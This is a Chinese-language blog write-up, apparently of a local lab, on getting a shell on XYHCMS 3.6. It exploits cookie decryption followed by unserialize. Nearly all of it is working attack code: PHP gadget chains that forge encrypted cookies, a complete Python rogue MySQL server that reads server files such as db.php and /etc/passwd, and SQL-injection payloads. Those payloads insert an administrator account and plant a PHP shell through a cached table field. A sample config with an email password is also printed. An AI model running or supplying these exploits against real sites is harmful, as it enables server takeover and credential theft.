• xyhcms getshell


    下载xyhcms3.6.2021版本并用phpstudy搭建

    function get_cookie($name, $key = '') {
    
    	if (!isset($_COOKIE[$name])) {
    		return null;
    	}
    	$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;
    
    	$value = $_COOKIE[$name];
    	$key = md5($key);
    	$sc = new \Common\Lib\SysCrypt($key);
    	$value = $sc->php_decrypt($value);
    	return unserialize($value);
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    这里将cookie name传过来的值进行了一个解密在反序列化,
    它这里会有一个随机key存放在App\Runtime\Data\668ff60dbc75e51592f9c46b573cd3eb_config目录下的site.php其中668ff60dbc75e51592f9c46b573cd3eb_config是随机生成的目录不可拆解

    a:78:{s:11:"CFG_WEBNAME";s:12:"我的网站";s:10:"CFG_WEBURL";s:21:"http://www.xyhcms.com";s:12:"CFG_WEBTITLE";s:12:"我的网站";s:12:"CFG_KEYWORDS";s:12:"我的网站";s:15:"CFG_DESCRIPTION";s:0:"";s:14:"CFG_THEMESTYLE";s:7:"default";s:17:"CFG_COOKIE_ENCODE";s:9:"UQAz3abDl";s:11:"CFG_POWERBY";s:0:"";s:9:"CFG_STATS";s:0:"";s:9:"CFG_BEIAN";s:0:"";s:11:"CFG_ADDRESS";s:15:"昆明北京路";s:9:"CFG_PHONE";s:10:"0871-66666";s:17:"CFG_WEBSITE_CLOSE";b:0;s:22:"CFG_WEBSITE_CLOSE_INFO";s:36:"站点维护中,请稍等一会...";s:15:"CFG_MOBILE_AUTO";b:1;s:14:"CFG_EMAIL_FROM";s:12:"ddend@qq.com";s:19:"CFG_EMAIL_FROM_NAME";s:6:"站名";s:14:"CFG_EMAIL_HOST";s:18:"smtp.exmail.qq.com";s:14:"CFG_EMAIL_PORT";i:25;s:19:"CFG_EMAIL_LOGINNAME";s:12:"ddend@qq.com";s:18:"CFG_EMAIL_PASSWORD";s:10:"123zstQhz4";s:11:"CFG_BADWORD";s:35:"艾滋病|中国共产党|111111111";s:18:"CFG_FEEDBACK_GUEST";b:1;s:15:"CFG_MEMBER_OPEN";b:1;s:22:"CFG_MEMBER_VERIFYEMAIL";b:0;s:19:"CFG_MEMBER_NOTALLOW";s:54:"www,bbs,ftp,mail,user,users,admin,administrator,xyhcms";s:18:"CFG_UPLOAD_MAXSIZE";i:2048;s:17:"CFG_IMGTHUMB_SIZE";a:2:{i:0;s:7:"300X300";i:1;s:5:"600X0";}s:17:"CFG_IMGTHUMB_TYPE";b:0;s:18:"CFG_CLICK_NUM_INIT";i:0;s:19:"CFG_UPLOAD_ROOTPATH";s:10:"./uploads/";s:19:"CFG_UPLOAD_FILE_EXT";s:49:"jpg,gif,png,jpeg,txt,doc,docx,xls,ppt,zip,rar,mp3";s:18:"CFG_UPLOAD_IMG_EXT";s:16:"jpg,gif,png,jpeg";s:19:"CFG_VERIFY_REGISTER";b:0;s:16:"CFG_VERIFY_LOGIN";b:0;s:20:"CFG_VERIFY_GUESTBOOK";b:1;s:17:"CFG_VERIFY_REVIEW";b:1;s:16:"CFG_SQL_FILESIZE";i:5242880;s:17:"CFG_DOWNLOAD_HIDE";b:1;s:21:"CFG_MOBILE_THEMESTYLE";s:7:"default";s:14:"HOME_URL_MODEL";i:3;s:22:"HOME_URL_PATHINFO_DEPR";s:1:"/";s:18:"HOME_URL_ROUTER_ON";b:0;s:20:"HOME_URL_ROUTE_RULES";a:6:{s:7:"Mobile$";s:18:"Mobile/Index/index";s:13:"Special/:id\d";s:13:"Special/shows";s:12:"Tag/:tname\w";s:9:"Tag/shows";s:9:":e/p/:p\d";s:10:"List/index";s:8:":e/:id\d";s:10:"Show/index";s:9:"/^(\w+)$/";s:15:"List/index?e=:1";}s:18:"HOME_HTML_CACHE_ON";b:0;s:20:"MOBILE_HTML_CACHE_ON";b:0;s:19:"HTML_CACHE_INDEX_ON";b:1;s:21:"HTML_CACHE_INDEX_TIME";i:1200;s:18:"HTML_CACHE_LIST_ON";b:1;s:20:"HTML_CACHE_LIST_TIME";i:0;s:18:"HTML_CACHE_SHOW_ON";b:1;s:20:"HTML_CACHE_SHOW_TIME";i:0;s:21:"HTML_CACHE_SPECIAL_ON";b:0;s:23:"HTML_CACHE_SPECIAL_TIME";i:0;s:15:"ONLINE_CFG_MODE";b:1;s:16:"ONLINE_CFG_STYLE";s:4:"blue";s:12:"ONLINE_CFG_H";i:1;s:19:"ONLINE_CFG_H_MARGIN";i:0;s:12:"ONLINE_CFG_V";i:2;s:19:"ONLINE_CFG_V_MARGIN";i:0;s:13:"ONLINE_CFG_QQ";a:2:{s:12:"销售咨询";s:9:"307299635";s:12:"售后服务";s:9:"307299635";}s:19:"ONLINE_CFG_WANGWANG";a:1:{s:12:"在线旺旺";s:5:"7bucn";}s:19:"ONLINE_CFG_PHONE_ON";b:1;s:16:"ONLINE_CFG_PHONE";a:2:{s:12:"销售热线";s:7:"6525411";s:12:"技术支持";s:7:"6525412";}s:23:"ONLINE_CFG_GUESTBOOK_ON";s:1:"1";s:19:"ONLINE_CFG_QQ_PARAM";s:166:"" href="http://wpa.qq.com/msgrd?v=3&uin=[客服号]&site=qq&menu=yes" class="xyh-online-item"> [客服说明]";s:25:"ONLINE_CFG_WANGWANG_PARAM";s:209:" [客服说明]";s:18:"CFG_IMAGE_WATER_ON";b:0;s:20:"CFG_IMAGE_WATER_FILE";s:27:"/Data/static/picture/sy.png";s:24:"CFG_IMAGE_WATER_POSITION";i:9;s:27:"CFG_IMAGE_WATER_DIAPHANEITY";i:100;s:28:"CFG_IMAGE_WATER_IGNORE_WIDTH";s:3:"300";s:18:"CODE_SEND_INTERVAL";i:120;s:16:"CODE_SEND_EXPIRE";i:300;s:26:"ACTIVATE_SEND_EMAIL_EXPIRE";i:172800;s:11:"SMS_SDK_ALI";a:4:{s:7:"APP_KEY";s:23:"阿里短信AccessKeyID";s:10:"APP_SECRET";s:27:"阿里短信AccessKeySecret";s:9:"SIGN_NAME";s:12:"短信签名";s:8:"SEND_URL";s:29:"https://dysmsapi.aliyuncs.com";}s:14:"SMS_SDK_TPL_ID";a:4:{s:11:"com_code1_1";s:29:"阿里短信模版通用CODE1";s:11:"reg_code1_1";s:29:"阿里短信模版注册CODE2";s:13:"login_code1_1";s:29:"阿里短信模版登录CODE3";s:14:"getpwd_code1_1";s:35:"阿里短信模版找回密码CODE4";}s:23:"HTML_CACHE_RULES_COMMON";a:3:{s:11:"index:index";a:2:{i:0;s:36:"{:module}/Index_{:action}_{p|intval}";i:1;i:1200;}s:10:"list:index";a:2:{i:0;s:51:"{:module}/List/{:action}_{e}{cid|intval}_{p|intval}";i:1;i:0;}s:10:"show:index";a:2:{i:0;s:52:"{:module}/Show/{:action}_{e}{cid|intval}_{id|intval}";i:1;i:0;}}}
    
    • 1

    可以看到key为UQAz3abDl

    测试加解密

    
    class SysCrypt {
    private $crypt_key;
    // 构造函数
    public function __construct($crypt_key) {
    $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0,32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0;$i<strlen($txt);$i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
    }
    return base64_encode(self::__key($tmp,$this -> crypt_key));
    }
    public function php_decrypt($txt) {
    $txt = self::__key(base64_decode($txt),$this -> crypt_key);
    $tmp = '';
    for($i = 0;$i < strlen($txt); $i++) {
    $md5 = $txt[$i];
    $tmp .= $txt[++$i] ^ $md5;
    }
    return $tmp;
    }
    private function __key($txt,$encrypt_key) {
    $encrypt_key = md5($encrypt_key);
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
    }
    public function __destruct() {
    $this -> crypt_key = null;
    }
    }
    /**
    * 得到指定cookie的值
    *
    * @param string $name
    */
    //function get_cookie($name, $key = '@^%$y5fbl') {
    function get_cookie($name, $key = '') {
    $key ='UQAz3abDl';
    $value = $name;
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_decrypt($value);
    return unserialize($value);
    }
    /**
    * 设置cookie
    *
    * @param array $args
    * @return boolean
    */
    //使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
    //function set_cookie($args , $key = '@^%$y5fbl') {
    function set_cookie($args, $key = '') {
    $key ='UQAz3abDl';
    $value = serialize($args);
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    //setcookie($cookieName ,$cookie, time()+3600,'/','',false);
    // return setcookie($name, $value, $expire, $path, $domain, $secure); 
    }
    //测试加密
    echo set_cookie('moonsec');
    //测试解密
    echo get_cookie('VCIBaVM2CmoGIQY/U2pXOQhvCXAFYAI3BnABMg==');
    
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79

    在这里插入图片描述
    反序列exp读取数据库配置文件

    
    namespace Think\Db\Driver;
    use PDO;
    class Mysql{
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
    "dsn" => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
    "username" => "root",
    "password" => "root"
    );
    }
    namespace Think;
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0"
    );
    }
    }
    namespace Think\Session\Driver;
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
    namespace Common\Lib;
    class SysCrypt{
    private $crypt_key;
    public function __construct($crypt_key) {
    $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0,32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0;$i<strlen($txt);$i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
    }
    return base64_encode(self::__key($tmp,$this -> crypt_key));
    }
    public function php_decrypt($txt) {
    $txt = self::__key(base64_decode($txt),$this -> crypt_key);
    $tmp = '';
    for($i = 0;$i < strlen($txt); $i++) {
    $md5 = $txt[$i];
    $tmp .= $txt[++$i] ^ $md5;
    }
    return $tmp;
    }
    private function __key($txt,$encrypt_key) {
    $encrypt_key = md5($encrypt_key);
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
    }
    public function __destruct() {
    $this -> crypt_key = null;
    }
    }
    function get_cookie($name, $key = '') {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
    }
    function set_cookie($args, $key = '') {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    }
    
    
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    echo str_replace('+','%2B',$a);
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103

    利用恶意mysql读取数据库配置文件

    #!/usr/bin/env python
    #coding: utf8
    
    
    import socket
    import asyncore
    import asynchat
    import struct
    import random
    import logging
    import logging.handlers
    
    
    
    PORT = 3306
    
    log = logging.getLogger(__name__)
    
    log.setLevel(logging.INFO)
    tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
    tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
    log.addHandler(
        tmp_format
    )
    
    filelist = (
       #'/etc/passwd',
       #'/www/wwwroot/www.xycms.com/App/Common/Conf/db.php',
       'D:/phpstudy_pro/WWW/www.xyhcms.com/App/Common/Conf/db.php',
    )
    
    
    #================================================
    #=======No need to change after this lines=======
    #================================================
    
    __author__ = 'Gifts'
    
    def daemonize():
        import os, warnings
        if os.name != 'posix':
            warnings.warn('Cant create daemon on non-posix system')
            return
    
        if os.fork(): os._exit(0)
        os.setsid()
        if os.fork(): os._exit(0)
        os.umask(0o022)
        null=os.open('/dev/null', os.O_RDWR)
        for i in xrange(3):
            try:
                os.dup2(null, i)
            except OSError as e:
                if e.errno != 9: raise
        os.close(null)
    
    
    class LastPacket(Exception):
        pass
    
    
    class OutOfOrder(Exception):
        pass
    
    
    class mysql_packet(object):
        packet_header = struct.Struct(')
        packet_header_long = struct.Struct(')
        def __init__(self, packet_type, payload):
            if isinstance(packet_type, mysql_packet):
                self.packet_num = packet_type.packet_num + 1
            else:
                self.packet_num = packet_type
            self.payload = payload
    
        def __str__(self):
            payload_len = len(self.payload)
            if payload_len < 65536:
                header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)
            else:
                header = mysql_packet.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)
    
            result = "{0}{1}".format(
                header,
                self.payload
            )
            return result
    
        def __repr__(self):
            return repr(str(self))
    
        @staticmethod
        def parse(raw_data):
            packet_num = ord(raw_data[0])
            payload = raw_data[1:]
    
            return mysql_packet(packet_num, payload)
    
    
    class http_request_handler(asynchat.async_chat):
    
        def __init__(self, addr):
            asynchat.async_chat.__init__(self, sock=addr[0])
            self.addr = addr[1]
            self.ibuffer = []
            self.set_terminator(3)
            self.state = 'LEN'
            self.sub_state = 'Auth'
            self.logined = False
            self.push(
                mysql_packet(
                    0,
                    "".join((
                        '\x0a',  # Protocol
                        '5.6.28-0ubuntu0.14.04.1' + '\0',
                        '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
                    ))            )
            )
    
            self.order = 1
            self.states = ['LOGIN', 'CAPS', 'ANY']
    
        def push(self, data):
            log.debug('Pushed: %r', data)
            data = str(data)
            asynchat.async_chat.push(self, data)
    
        def collect_incoming_data(self, data):
            log.debug('Data recved: %r', data)
            self.ibuffer.append(data)
    
        def found_terminator(self):
            data = "".join(self.ibuffer)
            self.ibuffer = []
    
            if self.state == 'LEN':
                len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1
                if len_bytes < 65536:
                    self.set_terminator(len_bytes)
                    self.state = 'Data'
                else:
                    self.state = 'MoreLength'
            elif self.state == 'MoreLength':
                if data[0] != '\0':
                    self.push(None)
                    self.close_when_done()
                else:
                    self.state = 'Data'
            elif self.state == 'Data':
                packet = mysql_packet.parse(data)
                try:
                    if self.order != packet.packet_num:
                        raise OutOfOrder()
                    else:
                        # Fix ?
                        self.order = packet.packet_num + 2
                    if packet.packet_num == 0:
                        if packet.payload[0] == '\x03':
                            log.info('Query')
    
                            filename = random.choice(filelist)
                            PACKET = mysql_packet(
                                packet,
                                '\xFB{0}'.format(filename)
                            )
                            self.set_terminator(3)
                            self.state = 'LEN'
                            self.sub_state = 'File'
                            self.push(PACKET)
                        elif packet.payload[0] == '\x1b':
                            log.info('SelectDB')
                            self.push(mysql_packet(
                                packet,
                                '\xfe\x00\x00\x02\x00'
                            ))
                            raise LastPacket()
                        elif packet.payload[0] in '\x02':
                            self.push(mysql_packet(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise LastPacket()
                        elif packet.payload == '\x00\x01':
                            self.push(None)
                            self.close_when_done()
                        else:
                            raise ValueError()
                    else:
                        if self.sub_state == 'File':
                            log.info('-- result')
                            log.info('Result: %r', data)
    
                            if len(data) == 1:
                                self.push(
                                    mysql_packet(packet, '\0\0\0\x02\0\0\0')
                                )
                                raise LastPacket()
                            else:
                                self.set_terminator(3)
                                self.state = 'LEN'
                                self.order = packet.packet_num + 1
    
                        elif self.sub_state == 'Auth':
                            self.push(mysql_packet(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise LastPacket()
                        else:
                            log.info('-- else')
                            raise ValueError('Unknown packet')
                except LastPacket:
                    log.info('Last packet')
                    self.state = 'LEN'
                    self.sub_state = None
                    self.order = 0
                    self.set_terminator(3)
                except OutOfOrder:
                    log.warning('Out of order')
                    self.push(None)
                    self.close_when_done()
            else:
                log.error('Unknown state')
                self.push('None')
                self.close_when_done()
    
    
    class mysql_listener(asyncore.dispatcher):
        def __init__(self, sock=None):
            asyncore.dispatcher.__init__(self, sock)
    
            if not sock:
                self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
                self.set_reuse_addr()
                try:
                    self.bind(('', PORT))
                except socket.error:
                    exit()
    
                self.listen(5)
    
        def handle_accept(self):
            pair = self.accept()
    
            if pair is not None:
                log.info('Conn from: %r', pair[1])
                tmp = http_request_handler(pair)
    
    
    z = mysql_listener()
    # daemonize()
    asyncore.loop()
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103
    • 104
    • 105
    • 106
    • 107
    • 108
    • 109
    • 110
    • 111
    • 112
    • 113
    • 114
    • 115
    • 116
    • 117
    • 118
    • 119
    • 120
    • 121
    • 122
    • 123
    • 124
    • 125
    • 126
    • 127
    • 128
    • 129
    • 130
    • 131
    • 132
    • 133
    • 134
    • 135
    • 136
    • 137
    • 138
    • 139
    • 140
    • 141
    • 142
    • 143
    • 144
    • 145
    • 146
    • 147
    • 148
    • 149
    • 150
    • 151
    • 152
    • 153
    • 154
    • 155
    • 156
    • 157
    • 158
    • 159
    • 160
    • 161
    • 162
    • 163
    • 164
    • 165
    • 166
    • 167
    • 168
    • 169
    • 170
    • 171
    • 172
    • 173
    • 174
    • 175
    • 176
    • 177
    • 178
    • 179
    • 180
    • 181
    • 182
    • 183
    • 184
    • 185
    • 186
    • 187
    • 188
    • 189
    • 190
    • 191
    • 192
    • 193
    • 194
    • 195
    • 196
    • 197
    • 198
    • 199
    • 200
    • 201
    • 202
    • 203
    • 204
    • 205
    • 206
    • 207
    • 208
    • 209
    • 210
    • 211
    • 212
    • 213
    • 214
    • 215
    • 216
    • 217
    • 218
    • 219
    • 220
    • 221
    • 222
    • 223
    • 224
    • 225
    • 226
    • 227
    • 228
    • 229
    • 230
    • 231
    • 232
    • 233
    • 234
    • 235
    • 236
    • 237
    • 238
    • 239
    • 240
    • 241
    • 242
    • 243
    • 244
    • 245
    • 246
    • 247
    • 248
    • 249
    • 250
    • 251

    python直接运行连接端口为3306

    在登录之后将密文填到nickname里面就能反序列化了
    添加管理员用户

    namespace Think\Db\Driver;
    use PDO;
    class Mysql{
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
    "dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
    "username" => "root",
    "password" => "123456"
    );
    }
    namespace Think;
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0;insert into www_xycms_com.xyh_admin
    (id,username,password,encrypt,user_type,is_lock,login_num) VALUES
    (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"
    );
    /**test/123456**/
    }
    }
    namespace Think\Session\Driver;
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
    namespace Common\Lib;
    class SysCrypt{
    private $crypt_key;
    public function __construct($crypt_key) {
    $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0,32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0;$i crypt_key));
    }
    public function php_decrypt($txt) {
    $txt = self::__key(base64_decode($txt),$this -> crypt_key);
    $tmp = '';
    for($i = 0;$i < strlen($txt); $i++) {
    $md5 = $txt[$i];
    $tmp .= $txt[++$i] ^ $md5;
    }
    return $tmp;
    }
    private function __key($txt,$encrypt_key) {
    $encrypt_key = md5($encrypt_key);
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
    }
    public function __destruct() {
    $this -> crypt_key = null;
    }
    }
    function get_cookie($name, $key = '') {
    $key = 'UQAz3abDl';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
    }
    function set_cookie($args, $key = '') {
    $key = 'UQAz3abDl';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    }
    
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    echo str_replace('+','%2B',$a);
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103
    • 104

    在这里插入图片描述
    成功添加用户
    后台getshell

    
    
    
    namespace Think\Db\Driver;
    use PDO;
    class Mysql{
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
    "dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
    "username" => "root",
    "password" => "123456"
    );
    }
    namespace Think;
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0; alter table xyh_guestbook add column `` varchar(10);",
    );
    }
    }
    namespace Think\Session\Driver;
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
    namespace Common\Lib;
    class SysCrypt{
    private $crypt_key;
    public function __construct($crypt_key) {
    $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0,32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0;$i<strlen($txt);$i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
    }
    return base64_encode(self::__key($tmp,$this -> crypt_key));
    }
    public function php_decrypt($txt) {
    $txt = self::__key(base64_decode($txt),$this -> crypt_key);
    $tmp = '';
    for($i = 0;$i < strlen($txt); $i++) {
    $md5 = $txt[$i];
    $tmp .= $txt[++$i] ^ $md5;
    }
    return $tmp;
    }
    private function __key($txt,$encrypt_key) {
    $encrypt_key = md5($encrypt_key);
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
    $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
    }
    public function __destruct() {
    $this -> crypt_key = null;
    }
    }
    function get_cookie($name, $key = '') {
    $key = 'UQAz3abDl';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
    }
    function set_cookie($args, $key = '') {
    $key = 'UQAz3abDl';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    }
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    echo str_replace('+','%2B',$a);
    
    ?>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50
    • 51
    • 52
    • 53
    • 54
    • 55
    • 56
    • 57
    • 58
    • 59
    • 60
    • 61
    • 62
    • 63
    • 64
    • 65
    • 66
    • 67
    • 68
    • 69
    • 70
    • 71
    • 72
    • 73
    • 74
    • 75
    • 76
    • 77
    • 78
    • 79
    • 80
    • 81
    • 82
    • 83
    • 84
    • 85
    • 86
    • 87
    • 88
    • 89
    • 90
    • 91
    • 92
    • 93
    • 94
    • 95
    • 96
    • 97
    • 98
    • 99
    • 100
    • 101
    • 102
    • 103
    • 104
    • 105
    • 106

    在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问
    终于进来了。
    在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问

    http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/w
    ww_xycms_com.xyh_guestbook.php

  • 相关阅读:
    基于 SpringBoot+Vue 的口腔管理平台,附源码,数据库
    0915练习
    剑指 Offer 05. 替换空格
    《MLB棒球创造营》:走近棒球运动·明尼苏达双城队
